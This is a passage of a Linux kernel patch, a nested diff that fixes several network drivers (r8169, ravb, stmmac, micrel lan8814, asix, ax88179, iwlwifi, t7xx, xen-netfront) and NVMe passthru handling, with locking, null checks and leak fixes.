+ static void rtl8168dp_driver_start(struct rtl8169_private *tp)
+ {
+ 	r8168dp_oob_notify(tp, OOB_CMD_DRIVER_START);
+-	rtl_loop_wait_high(tp, &rtl_dp_ocp_read_cond, 10000, 10);
++	rtl_dash_loop_wait_high(tp, &rtl_dp_ocp_read_cond, 10000, 10);
+ }
+ 
+ static void rtl8168ep_driver_start(struct rtl8169_private *tp)
+ {
+ 	r8168ep_ocp_write(tp, 0x01, 0x180, OOB_CMD_DRIVER_START);
+ 	r8168ep_ocp_write(tp, 0x01, 0x30, r8168ep_ocp_read(tp, 0x30) | 0x01);
+-	rtl_loop_wait_high(tp, &rtl_ep_ocp_read_cond, 10000, 30);
++	rtl_dash_loop_wait_high(tp, &rtl_ep_ocp_read_cond, 10000, 30);
+ }
+ 
+ static void rtl8168_driver_start(struct rtl8169_private *tp)
+@@ -1159,7 +1232,7 @@ static void rtl8168_driver_start(struct rtl8169_private *tp)
+ static void rtl8168dp_driver_stop(struct rtl8169_private *tp)
+ {
+ 	r8168dp_oob_notify(tp, OOB_CMD_DRIVER_STOP);
+-	rtl_loop_wait_low(tp, &rtl_dp_ocp_read_cond, 10000, 10);
++	rtl_dash_loop_wait_low(tp, &rtl_dp_ocp_read_cond, 10000, 10);
+ }
+ 
+ static void rtl8168ep_driver_stop(struct rtl8169_private *tp)
+@@ -1167,7 +1240,7 @@ static void rtl8168ep_driver_stop(struct rtl8169_private *tp)
+ 	rtl8168ep_stop_cmac(tp);
+ 	r8168ep_ocp_write(tp, 0x01, 0x180, OOB_CMD_DRIVER_STOP);
+ 	r8168ep_ocp_write(tp, 0x01, 0x30, r8168ep_ocp_read(tp, 0x30) | 0x01);
+-	rtl_loop_wait_low(tp, &rtl_ep_ocp_read_cond, 10000, 10);
++	rtl_dash_loop_wait_low(tp, &rtl_ep_ocp_read_cond, 10000, 10);
+ }
+ 
+ static void rtl8168_driver_stop(struct rtl8169_private *tp)
+@@ -1351,6 +1424,7 @@ static void __rtl8169_set_wol(struct rtl8169_private *tp, u32 wolopts)
+ 		{ WAKE_MAGIC, Config3, MagicPacket }
+ 	};
+ 	unsigned int i, tmp = ARRAY_SIZE(cfg);
++	unsigned long flags;
+ 	u8 options;
+ 
+ 	rtl_unlock_config_regs(tp);
+@@ -1369,12 +1443,14 @@ static void __rtl8169_set_wol(struct rtl8169_private *tp, u32 wolopts)
+ 			r8168_mac_ocp_modify(tp, 0xc0b6, BIT(0), 0);
+ 	}
+ 
++	spin_lock_irqsave(&tp->config25_lock, flags);
+ 	for (i = 0; i < tmp; i++) {
+ 		options = RTL_R8(tp, cfg[i].reg) & ~cfg[i].mask;
+ 		if (wolopts & cfg[i].opt)
+ 			options |= cfg[i].mask;
+ 		RTL_W8(tp, cfg[i].reg, options);
+ 	}
++	spin_unlock_irqrestore(&tp->config25_lock, flags);
+ 
+ 	switch (tp->mac_version) {
+ 	case RTL_GIGA_MAC_VER_02 ... RTL_GIGA_MAC_VER_06:
+@@ -1386,10 +1462,10 @@ static void __rtl8169_set_wol(struct rtl8169_private *tp, u32 wolopts)
+ 	case RTL_GIGA_MAC_VER_34:
+ 	case RTL_GIGA_MAC_VER_37:
+ 	case RTL_GIGA_MAC_VER_39 ... RTL_GIGA_MAC_VER_63:
+-		options = RTL_R8(tp, Config2) & ~PME_SIGNAL;
+ 		if (wolopts)
+-			options |= PME_SIGNAL;
+-		RTL_W8(tp, Config2, options);
++			rtl_mod_config2(tp, 0, PME_SIGNAL);
++		else
++			rtl_mod_config2(tp, PME_SIGNAL, 0);
+ 		break;
+ 	default:
+ 		break;
+@@ -2696,10 +2772,13 @@ static void rtl_disable_exit_l1(struct rtl8169_private *tp)
+ 
+ static void rtl_hw_aspm_clkreq_enable(struct rtl8169_private *tp, bool enable)
+ {
++	if (tp->mac_version < RTL_GIGA_MAC_VER_32)
++		return;
++
+ 	/* Don't enable ASPM in the chip if OS can't control ASPM */
+ 	if (enable && tp->aspm_manageable) {
+-		RTL_W8(tp, Config5, RTL_R8(tp, Config5) | ASPM_en);
+-		RTL_W8(tp, Config2, RTL_R8(tp, Config2) | ClkReqEn);
++		rtl_mod_config5(tp, 0, ASPM_en);
++		rtl_mod_config2(tp, 0, ClkReqEn);
+ 
+ 		switch (tp->mac_version) {
+ 		case RTL_GIGA_MAC_VER_46 ... RTL_GIGA_MAC_VER_48:
+@@ -2722,11 +2801,9 @@ static void rtl_hw_aspm_clkreq_enable(struct rtl8169_private *tp, bool enable)
+ 			break;
+ 		}
+ 
+-		RTL_W8(tp, Config2, RTL_R8(tp, Config2) & ~ClkReqEn);
+-		RTL_W8(tp, Config5, RTL_R8(tp, Config5) & ~ASPM_en);
++		rtl_mod_config2(tp, ClkReqEn, 0);
++		rtl_mod_config5(tp, ASPM_en, 0);
+ 	}
+-
+-	udelay(10);
+ }
+ 
+ static void rtl_set_fifo_size(struct rtl8169_private *tp, u16 rx_stat,
+@@ -2884,7 +2961,7 @@ static void rtl_hw_start_8168e_1(struct rtl8169_private *tp)
+ 	RTL_W32(tp, MISC, RTL_R32(tp, MISC) | TXPLA_RST);
+ 	RTL_W32(tp, MISC, RTL_R32(tp, MISC) & ~TXPLA_RST);
+ 
+-	RTL_W8(tp, Config5, RTL_R8(tp, Config5) & ~Spi_en);
++	rtl_mod_config5(tp, Spi_en, 0);
+ }
+ 
+ static void rtl_hw_start_8168e_2(struct rtl8169_private *tp)
+@@ -2917,7 +2994,7 @@ static void rtl_hw_start_8168e_2(struct rtl8169_private *tp)
+ 
+ 	RTL_W8(tp, DLLPR, RTL_R8(tp, DLLPR) | PFM_EN);
+ 	RTL_W32(tp, MISC, RTL_R32(tp, MISC) | PWM_EN);
+-	RTL_W8(tp, Config5, RTL_R8(tp, Config5) & ~Spi_en);
++	rtl_mod_config5(tp, Spi_en, 0);
+ 
+ 	rtl_hw_aspm_clkreq_enable(tp, true);
+ }
+@@ -2940,7 +3017,7 @@ static void rtl_hw_start_8168f(struct rtl8169_private *tp)
+ 	RTL_W8(tp, MCU, RTL_R8(tp, MCU) & ~NOW_IS_OOB);
+ 	RTL_W8(tp, DLLPR, RTL_R8(tp, DLLPR) | PFM_EN);
+ 	RTL_W32(tp, MISC, RTL_R32(tp, MISC) | PWM_EN);
+-	RTL_W8(tp, Config5, RTL_R8(tp, Config5) & ~Spi_en);
++	rtl_mod_config5(tp, Spi_en, 0);
+ 
+ 	rtl8168_config_eee_mac(tp);
+ }
+@@ -5032,6 +5109,15 @@ static int r8169_mdio_register(struct rtl8169_private *tp)
+ 	struct mii_bus *new_bus;
+ 	int ret;
+ 
++	/* On some boards with this chip version the BIOS is buggy and misses
++	 * to reset the PHY page selector. This results in the PHY ID read
++	 * accessing registers on a different page, returning a more or
++	 * less random value. Fix this by resetting the page selector first.
++	 */
++	if (tp->mac_version == RTL_GIGA_MAC_VER_25 ||
++	    tp->mac_version == RTL_GIGA_MAC_VER_26)
++		r8169_mdio_write(tp, 0x1f, 0);
++
+ 	new_bus = devm_mdiobus_alloc(&pdev->dev);
+ 	if (!new_bus)
+ 		return -ENOMEM;
+@@ -5062,7 +5148,7 @@ static int r8169_mdio_register(struct rtl8169_private *tp)
+ 		return -EUNATCH;
+ 	}
+ 
+-	tp->phydev->mac_managed_pm = 1;
++	tp->phydev->mac_managed_pm = true;
+ 
+ 	phy_support_asym_pause(tp->phydev);
+ 
+@@ -5200,6 +5286,9 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	tp->eee_adv = -1;
+ 	tp->ocp_base = OCP_STD_PHY_BASE;
+ 
++	spin_lock_init(&tp->config25_lock);
++	spin_lock_init(&tp->mac_ocp_lock);
++
+ 	dev->tstats = devm_netdev_alloc_pcpu_stats(&pdev->dev,
+ 						   struct pcpu_sw_netstats);
+ 	if (!dev->tstats)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index e7b70006261f7..756ac4a07f60b 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1290,25 +1290,16 @@ static int ravb_poll(struct napi_struct *napi, int budget)
+ 	struct net_device *ndev = napi->dev;
+ 	struct ravb_private *priv = netdev_priv(ndev);
+ 	const struct ravb_hw_info *info = priv->info;
+-	bool gptp = info->gptp || info->ccc_gac;
+-	struct ravb_rx_desc *desc;
+ 	unsigned long flags;
+ 	int q = napi - priv->napi;
+ 	int mask = BIT(q);
+ 	int quota = budget;
+-	unsigned int entry;
++	bool unmask;
+ 
+-	if (!gptp) {
+-		entry = priv->cur_rx[q] % priv->num_rx_ring[q];
+-		desc = &priv->gbeth_rx_ring[entry];
+-	}
+ 	/* Processing RX Descriptor Ring */
+ 	/* Clear RX interrupt */
+ 	ravb_write(ndev, ~(mask | RIS0_RESERVED), RIS0);
+-	if (gptp || desc->die_dt != DT_FEMPTY) {
+-		if (ravb_rx(ndev, &quota, q))
+-			goto out;
+-	}
++	unmask = !ravb_rx(ndev, &quota, q);
+ 
+ 	/* Processing TX Descriptor Ring */
+ 	spin_lock_irqsave(&priv->lock, flags);
+@@ -1318,6 +1309,18 @@ static int ravb_poll(struct napi_struct *napi, int budget)
+ 	netif_wake_subqueue(ndev, q);
+ 	spin_unlock_irqrestore(&priv->lock, flags);
+ 
++	/* Receive error message handling */
++	priv->rx_over_errors = priv->stats[RAVB_BE].rx_over_errors;
++	if (info->nc_queues)
++		priv->rx_over_errors += priv->stats[RAVB_NC].rx_over_errors;
++	if (priv->rx_over_errors != ndev->stats.rx_over_errors)
++		ndev->stats.rx_over_errors = priv->rx_over_errors;
++	if (priv->rx_fifo_errors != ndev->stats.rx_fifo_errors)
++		ndev->stats.rx_fifo_errors = priv->rx_fifo_errors;
++
++	if (!unmask)
++		goto out;
++
+ 	napi_complete(napi);
+ 
+ 	/* Re-enable RX/TX interrupts */
+@@ -1331,14 +1334,6 @@ static int ravb_poll(struct napi_struct *napi, int budget)
+ 	}
+ 	spin_unlock_irqrestore(&priv->lock, flags);
+ 
+-	/* Receive error message handling */
+-	priv->rx_over_errors =  priv->stats[RAVB_BE].rx_over_errors;
+-	if (info->nc_queues)
+-		priv->rx_over_errors += priv->stats[RAVB_NC].rx_over_errors;
+-	if (priv->rx_over_errors != ndev->stats.rx_over_errors)
+-		ndev->stats.rx_over_errors = priv->rx_over_errors;
+-	if (priv->rx_fifo_errors != ndev->stats.rx_fifo_errors)
+-		ndev->stats.rx_fifo_errors = priv->rx_fifo_errors;
+ out:
+ 	return budget - quota;
+ }
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index 84276eb681d70..39112d5cb5b80 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -87,19 +87,41 @@ static void dwmac4_rx_queue_priority(struct mac_device_info *hw,
+ 				     u32 prio, u32 queue)
+ {
+ 	void __iomem *ioaddr = hw->pcsr;
+-	u32 base_register;
+-	u32 value;
++	u32 clear_mask = 0;
++	u32 ctrl2, ctrl3;
++	int i;
+ 
+-	base_register = (queue < 4) ? GMAC_RXQ_CTRL2 : GMAC_RXQ_CTRL3;
+-	if (queue >= 4)
+-		queue -= 4;
++	ctrl2 = readl(ioaddr + GMAC_RXQ_CTRL2);
++	ctrl3 = readl(ioaddr + GMAC_RXQ_CTRL3);
+ 
+-	value = readl(ioaddr + base_register);
++	/* The software must ensure that the same priority
++	 * is not mapped to multiple Rx queues
++	 */
++	for (i = 0; i < 4; i++)
++		clear_mask |= ((prio << GMAC_RXQCTRL_PSRQX_SHIFT(i)) &
++						GMAC_RXQCTRL_PSRQX_MASK(i));
+ 
+-	value &= ~GMAC_RXQCTRL_PSRQX_MASK(queue);
+-	value |= (prio << GMAC_RXQCTRL_PSRQX_SHIFT(queue)) &
++	ctrl2 &= ~clear_mask;
++	ctrl3 &= ~clear_mask;
++
++	/* First assign new priorities to a queue, then
++	 * clear them from others queues
++	 */
++	if (queue < 4) {
++		ctrl2 |= (prio << GMAC_RXQCTRL_PSRQX_SHIFT(queue)) &
+ 						GMAC_RXQCTRL_PSRQX_MASK(queue);
+-	writel(value, ioaddr + base_register);
++
++		writel(ctrl2, ioaddr + GMAC_RXQ_CTRL2);
++		writel(ctrl3, ioaddr + GMAC_RXQ_CTRL3);
++	} else {
++		queue -= 4;
++
++		ctrl3 |= (prio << GMAC_RXQCTRL_PSRQX_SHIFT(queue)) &
++						GMAC_RXQCTRL_PSRQX_MASK(queue);
++
++		writel(ctrl3, ioaddr + GMAC_RXQ_CTRL3);
++		writel(ctrl2, ioaddr + GMAC_RXQ_CTRL2);
++	}
+ }
+ 
+ static void dwmac4_tx_queue_priority(struct mac_device_info *hw,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index ec1616ffbfa7a..dd73f38ec08d8 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -97,17 +97,41 @@ static void dwxgmac2_rx_queue_prio(struct mac_device_info *hw, u32 prio,
+ 				   u32 queue)
+ {
+ 	void __iomem *ioaddr = hw->pcsr;
+-	u32 value, reg;
++	u32 clear_mask = 0;
++	u32 ctrl2, ctrl3;
++	int i;
+ 
+-	reg = (queue < 4) ? XGMAC_RXQ_CTRL2 : XGMAC_RXQ_CTRL3;
+-	if (queue >= 4)
++	ctrl2 = readl(ioaddr + XGMAC_RXQ_CTRL2);
++	ctrl3 = readl(ioaddr + XGMAC_RXQ_CTRL3);
++
++	/* The software must ensure that the same priority
++	 * is not mapped to multiple Rx queues
++	 */
++	for (i = 0; i < 4; i++)
++		clear_mask |= ((prio << XGMAC_PSRQ_SHIFT(i)) &
++						XGMAC_PSRQ(i));
++
++	ctrl2 &= ~clear_mask;
++	ctrl3 &= ~clear_mask;
++
++	/* First assign new priorities to a queue, then
++	 * clear them from others queues
++	 */
++	if (queue < 4) {
++		ctrl2 |= (prio << XGMAC_PSRQ_SHIFT(queue)) &
++						XGMAC_PSRQ(queue);
++
++		writel(ctrl2, ioaddr + XGMAC_RXQ_CTRL2);
++		writel(ctrl3, ioaddr + XGMAC_RXQ_CTRL3);
++	} else {
+ 		queue -= 4;
+ 
+-	value = readl(ioaddr + reg);
+-	value &= ~XGMAC_PSRQ(queue);
+-	value |= (prio << XGMAC_PSRQ_SHIFT(queue)) & XGMAC_PSRQ(queue);
++		ctrl3 |= (prio << XGMAC_PSRQ_SHIFT(queue)) &
++						XGMAC_PSRQ(queue);
+ 
+-	writel(value, ioaddr + reg);
++		writel(ctrl3, ioaddr + XGMAC_RXQ_CTRL3);
++		writel(ctrl2, ioaddr + XGMAC_RXQ_CTRL2);
++	}
+ }
+ 
+ static void dwxgmac2_tx_queue_prio(struct mac_device_info *hw, u32 prio,
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 9481f172830f5..2cbb1d1830bbd 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -2188,6 +2188,7 @@ static int lan8814_hwtstamp(struct mii_timestamper *mii_ts, struct ifreq *ifr)
+ 	struct hwtstamp_config config;
+ 	int txcfg = 0, rxcfg = 0;
+ 	int pkt_ts_enable;
++	int tx_mod;
+ 
+ 	if (copy_from_user(&config, ifr->ifr_data, sizeof(config)))
+ 		return -EFAULT;
+@@ -2237,9 +2238,14 @@ static int lan8814_hwtstamp(struct mii_timestamper *mii_ts, struct ifreq *ifr)
+ 	lanphy_write_page_reg(ptp_priv->phydev, 5, PTP_RX_TIMESTAMP_EN, pkt_ts_enable);
+ 	lanphy_write_page_reg(ptp_priv->phydev, 5, PTP_TX_TIMESTAMP_EN, pkt_ts_enable);
+ 
+-	if (ptp_priv->hwts_tx_type == HWTSTAMP_TX_ONESTEP_SYNC)
++	tx_mod = lanphy_read_page_reg(ptp_priv->phydev, 5, PTP_TX_MOD);
++	if (ptp_priv->hwts_tx_type == HWTSTAMP_TX_ONESTEP_SYNC) {
+ 		lanphy_write_page_reg(ptp_priv->phydev, 5, PTP_TX_MOD,
+-				      PTP_TX_MOD_TX_PTP_SYNC_TS_INSERT_);
++				      tx_mod | PTP_TX_MOD_TX_PTP_SYNC_TS_INSERT_);
++	} else if (ptp_priv->hwts_tx_type == HWTSTAMP_TX_ON) {
++		lanphy_write_page_reg(ptp_priv->phydev, 5, PTP_TX_MOD,
++				      tx_mod & ~PTP_TX_MOD_TX_PTP_SYNC_TS_INSERT_);
++	}
+ 
+ 	if (config.rx_filter != HWTSTAMP_FILTER_NONE)
+ 		lan8814_config_ts_intr(ptp_priv->phydev, true);
+@@ -2297,7 +2303,7 @@ static void lan8814_txtstamp(struct mii_timestamper *mii_ts,
+ 	}
+ }
+ 
+-static void lan8814_get_sig_rx(struct sk_buff *skb, u16 *sig)
++static bool lan8814_get_sig_rx(struct sk_buff *skb, u16 *sig)
+ {
+ 	struct ptp_header *ptp_header;
+ 	u32 type;
+@@ -2307,7 +2313,11 @@ static void lan8814_get_sig_rx(struct sk_buff *skb, u16 *sig)
+ 	ptp_header = ptp_parse_header(skb, type);
+ 	skb_pull_inline(skb, ETH_HLEN);
+ 
++	if (!ptp_header)
++		return false;
++
+ 	*sig = (__force u16)(ntohs(ptp_header->sequence_id));
++	return true;
+ }
+ 
+ static bool lan8814_match_rx_ts(struct kszphy_ptp_priv *ptp_priv,
+@@ -2319,7 +2329,8 @@ static bool lan8814_match_rx_ts(struct kszphy_ptp_priv *ptp_priv,
+ 	bool ret = false;
+ 	u16 skb_sig;
+ 
+-	lan8814_get_sig_rx(skb, &skb_sig);
++	if (!lan8814_get_sig_rx(skb, &skb_sig))
++		return ret;
+ 
+ 	/* Iterate over all RX timestamps and match it with the received skbs */
+ 	spin_lock_irqsave(&ptp_priv->rx_ts_lock, flags);
+@@ -2599,7 +2610,7 @@ static int lan8814_ptpci_adjfine(struct ptp_clock_info *ptpci, long scaled_ppm)
+ 	return 0;
+ }
+ 
+-static void lan8814_get_sig_tx(struct sk_buff *skb, u16 *sig)
++static bool lan8814_get_sig_tx(struct sk_buff *skb, u16 *sig)
+ {
+ 	struct ptp_header *ptp_header;
+ 	u32 type;
+@@ -2607,7 +2618,11 @@ static void lan8814_get_sig_tx(struct sk_buff *skb, u16 *sig)
+ 	type = ptp_classify_raw(skb);
+ 	ptp_header = ptp_parse_header(skb, type);
+ 
++	if (!ptp_header)
++		return false;
++
+ 	*sig = (__force u16)(ntohs(ptp_header->sequence_id));
++	return true;
+ }
+ 
+ static void lan8814_dequeue_tx_skb(struct kszphy_ptp_priv *ptp_priv)
+@@ -2625,7 +2640,8 @@ static void lan8814_dequeue_tx_skb(struct kszphy_ptp_priv *ptp_priv)
+ 
+ 	spin_lock_irqsave(&ptp_priv->tx_queue.lock, flags);
+ 	skb_queue_walk_safe(&ptp_priv->tx_queue, skb, skb_tmp) {
+-		lan8814_get_sig_tx(skb, &skb_sig);
++		if (!lan8814_get_sig_tx(skb, &skb_sig))
++			continue;
+ 
+ 		if (memcmp(&skb_sig, &seq_id, sizeof(seq_id)))
+ 			continue;
+@@ -2669,7 +2685,8 @@ static bool lan8814_match_skb(struct kszphy_ptp_priv *ptp_priv,
+ 
+ 	spin_lock_irqsave(&ptp_priv->rx_queue.lock, flags);
+ 	skb_queue_walk_safe(&ptp_priv->rx_queue, skb, skb_tmp) {
+-		lan8814_get_sig_rx(skb, &skb_sig);
++		if (!lan8814_get_sig_rx(skb, &skb_sig))
++			continue;
+ 
+ 		if (memcmp(&skb_sig, &rx_ts->seq_id, sizeof(rx_ts->seq_id)))
+ 			continue;
+diff --git a/drivers/net/usb/asix_devices.c b/drivers/net/usb/asix_devices.c
+index 6eacbf17f1c0c..34cd568b27f19 100644
+--- a/drivers/net/usb/asix_devices.c
++++ b/drivers/net/usb/asix_devices.c
+@@ -714,7 +714,7 @@ static int ax88772_init_phy(struct usbnet *dev)
+ 	}
+ 
+ 	phy_suspend(priv->phydev);
+-	priv->phydev->mac_managed_pm = 1;
++	priv->phydev->mac_managed_pm = true;
+ 
+ 	phy_attached_info(priv->phydev);
+ 
+@@ -734,7 +734,7 @@ static int ax88772_init_phy(struct usbnet *dev)
+ 		return -ENODEV;
+ 	}
+ 
+-	priv->phydev_int->mac_managed_pm = 1;
++	priv->phydev_int->mac_managed_pm = true;
+ 	phy_suspend(priv->phydev_int);
+ 
+ 	return 0;
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index d837c18874161..e0e9b4c53cb02 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1273,6 +1273,8 @@ static void ax88179_get_mac_addr(struct usbnet *dev)
+ 
+ 	if (is_valid_ether_addr(mac)) {
+ 		eth_hw_addr_set(dev->net, mac);
++		if (!is_local_ether_addr(mac))
++			dev->net->addr_assign_type = NET_ADDR_PERM;
+ 	} else {
+ 		netdev_info(dev->net, "invalid MAC address, using random\n");
+ 		eth_hw_addr_random(dev->net);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rfi.c b/drivers/net/wireless/intel/iwlwifi/mvm/rfi.c
+index bb77bc9aa8218..fb2408c0551d2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rfi.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rfi.c
+@@ -122,14 +122,18 @@ struct iwl_rfi_freq_table_resp_cmd *iwl_rfi_get_freq_table(struct iwl_mvm *mvm)
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+-	if (WARN_ON_ONCE(iwl_rx_packet_payload_len(cmd.resp_pkt) != resp_size))
++	if (WARN_ON_ONCE(iwl_rx_packet_payload_len(cmd.resp_pkt) !=
++			 resp_size)) {
++		iwl_free_resp(&cmd);
+ 		return ERR_PTR(-EIO);
++	}
+ 
+ 	resp = kmemdup(cmd.resp_pkt->data, resp_size, GFP_KERNEL);
++	iwl_free_resp(&cmd);
++
+ 	if (!resp)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	iwl_free_resp(&cmd);
+ 	return resp;
+ }
+ 
+diff --git a/drivers/net/wwan/t7xx/t7xx_cldma.c b/drivers/net/wwan/t7xx/t7xx_cldma.c
+index 9f43f256db1d0..f0a4783baf1f3 100644
+--- a/drivers/net/wwan/t7xx/t7xx_cldma.c
++++ b/drivers/net/wwan/t7xx/t7xx_cldma.c
+@@ -106,7 +106,7 @@ bool t7xx_cldma_tx_addr_is_set(struct t7xx_cldma_hw *hw_info, unsigned int qno)
+ {
+ 	u32 offset = REG_CLDMA_UL_START_ADDRL_0 + qno * ADDR_SIZE;
+ 
+-	return ioread64(hw_info->ap_pdn_base + offset);
++	return ioread64_lo_hi(hw_info->ap_pdn_base + offset);
+ }
+ 
+ void t7xx_cldma_hw_set_start_addr(struct t7xx_cldma_hw *hw_info, unsigned int qno, u64 address,
+@@ -117,7 +117,7 @@ void t7xx_cldma_hw_set_start_addr(struct t7xx_cldma_hw *hw_info, unsigned int qn
+ 
+ 	reg = tx_rx == MTK_RX ? hw_info->ap_ao_base + REG_CLDMA_DL_START_ADDRL_0 :
+ 				hw_info->ap_pdn_base + REG_CLDMA_UL_START_ADDRL_0;
+-	iowrite64(address, reg + offset);
++	iowrite64_lo_hi(address, reg + offset);
+ }
+ 
+ void t7xx_cldma_hw_resume_queue(struct t7xx_cldma_hw *hw_info, unsigned int qno,
+diff --git a/drivers/net/wwan/t7xx/t7xx_hif_cldma.c b/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
+index 6ff30cb8eb16f..5d6032ceb9e51 100644
+--- a/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
++++ b/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
+@@ -139,8 +139,9 @@ static int t7xx_cldma_gpd_rx_from_q(struct cldma_queue *queue, int budget, bool
+ 				return -ENODEV;
+ 			}
+ 
+-			gpd_addr = ioread64(hw_info->ap_pdn_base + REG_CLDMA_DL_CURRENT_ADDRL_0 +
+-					    queue->index * sizeof(u64));
++			gpd_addr = ioread64_lo_hi(hw_info->ap_pdn_base +
++						  REG_CLDMA_DL_CURRENT_ADDRL_0 +
++						  queue->index * sizeof(u64));
+ 			if (req->gpd_addr == gpd_addr || hwo_polling_count++ >= 100)
+ 				return 0;
+ 
+@@ -318,8 +319,8 @@ static void t7xx_cldma_txq_empty_hndl(struct cldma_queue *queue)
+ 		struct t7xx_cldma_hw *hw_info = &md_ctrl->hw_info;
+ 
+ 		/* Check current processing TGPD, 64-bit address is in a table by Q index */
+-		ul_curr_addr = ioread64(hw_info->ap_pdn_base + REG_CLDMA_UL_CURRENT_ADDRL_0 +
+-					queue->index * sizeof(u64));
++		ul_curr_addr = ioread64_lo_hi(hw_info->ap_pdn_base + REG_CLDMA_UL_CURRENT_ADDRL_0 +
++					      queue->index * sizeof(u64));
+ 		if (req->gpd_addr != ul_curr_addr) {
+ 			spin_unlock_irqrestore(&md_ctrl->cldma_lock, flags);
+ 			dev_err(md_ctrl->dev, "CLDMA%d queue %d is not empty\n",
+diff --git a/drivers/net/wwan/t7xx/t7xx_pcie_mac.c b/drivers/net/wwan/t7xx/t7xx_pcie_mac.c
+index 76da4c15e3de1..f071ec7ff23d5 100644
+--- a/drivers/net/wwan/t7xx/t7xx_pcie_mac.c
++++ b/drivers/net/wwan/t7xx/t7xx_pcie_mac.c
+@@ -75,7 +75,7 @@ static void t7xx_pcie_mac_atr_tables_dis(void __iomem *pbase, enum t7xx_atr_src_
+ 	for (i = 0; i < ATR_TABLE_NUM_PER_ATR; i++) {
+ 		offset = ATR_PORT_OFFSET * port + ATR_TABLE_OFFSET * i;
+ 		reg = pbase + ATR_PCIE_WIN0_T0_ATR_PARAM_SRC_ADDR + offset;
+-		iowrite64(0, reg);
++		iowrite64_lo_hi(0, reg);
+ 	}
+ }
+ 
+@@ -112,17 +112,17 @@ static int t7xx_pcie_mac_atr_cfg(struct t7xx_pci_dev *t7xx_dev, struct t7xx_atr_
+ 
+ 	reg = pbase + ATR_PCIE_WIN0_T0_TRSL_ADDR + offset;
+ 	value = cfg->trsl_addr & ATR_PCIE_WIN0_ADDR_ALGMT;
+-	iowrite64(value, reg);
++	iowrite64_lo_hi(value, reg);
+ 
+ 	reg = pbase + ATR_PCIE_WIN0_T0_TRSL_PARAM + offset;
+ 	iowrite32(cfg->trsl_id, reg);
+ 
+ 	reg = pbase + ATR_PCIE_WIN0_T0_ATR_PARAM_SRC_ADDR + offset;
+ 	value = (cfg->src_addr & ATR_PCIE_WIN0_ADDR_ALGMT) | (atr_size << 1) | BIT(0);
+-	iowrite64(value, reg);
++	iowrite64_lo_hi(value, reg);
+ 
+ 	/* Ensure ATR is set */
+-	ioread64(reg);
++	ioread64_lo_hi(reg);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/xen-netfront.c b/drivers/net/xen-netfront.c
+index dc404e05970cd..95b5ab4b964e2 100644
+--- a/drivers/net/xen-netfront.c
++++ b/drivers/net/xen-netfront.c
+@@ -285,6 +285,7 @@ static struct sk_buff *xennet_alloc_one_rx_buffer(struct netfront_queue *queue)
+ 		return NULL;
+ 	}
+ 	skb_add_rx_frag(skb, 0, page, 0, 0, PAGE_SIZE);
++	skb_mark_for_recycle(skb);
+ 
+ 	/* Align ip header to a 16 bytes boundary */
+ 	skb_reserve(skb, NET_IP_ALIGN);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index d7516e99275b6..20160683e8685 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1151,7 +1151,7 @@ static u32 nvme_passthru_start(struct nvme_ctrl *ctrl, struct nvme_ns *ns,
+ 	return effects;
+ }
+ 
+-void nvme_passthru_end(struct nvme_ctrl *ctrl, u32 effects,
++void nvme_passthru_end(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u32 effects,
+ 		       struct nvme_command *cmd, int status)
+ {
+ 	if (effects & NVME_CMD_EFFECTS_CSE_MASK) {
+@@ -1167,6 +1167,8 @@ void nvme_passthru_end(struct nvme_ctrl *ctrl, u32 effects,
+ 		nvme_queue_scan(ctrl);
+ 		flush_work(&ctrl->scan_work);
+ 	}
++	if (ns)
++		return;
+ 
+ 	switch (cmd->common.opcode) {
+ 	case nvme_admin_set_features:
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index 91e6d03475798..b3e322e4ade38 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -147,6 +147,7 @@ static int nvme_submit_user_cmd(struct request_queue *q,
+ 		unsigned bufflen, void __user *meta_buffer, unsigned meta_len,
+ 		u32 meta_seed, u64 *result, unsigned timeout, bool vec)
+ {
++	struct nvme_ns *ns = q->queuedata;
+ 	struct nvme_ctrl *ctrl;
+ 	struct request *req;
+ 	void *meta = NULL;
+@@ -181,7 +182,7 @@ static int nvme_submit_user_cmd(struct request_queue *q,
+ 	blk_mq_free_request(req);
+ 
+ 	if (effects)
+-		nvme_passthru_end(ctrl, effects, cmd, ret);
++		nvme_passthru_end(ctrl, ns, effects, cmd, ret);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index a892d679e3389..8e28d2de45c0e 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
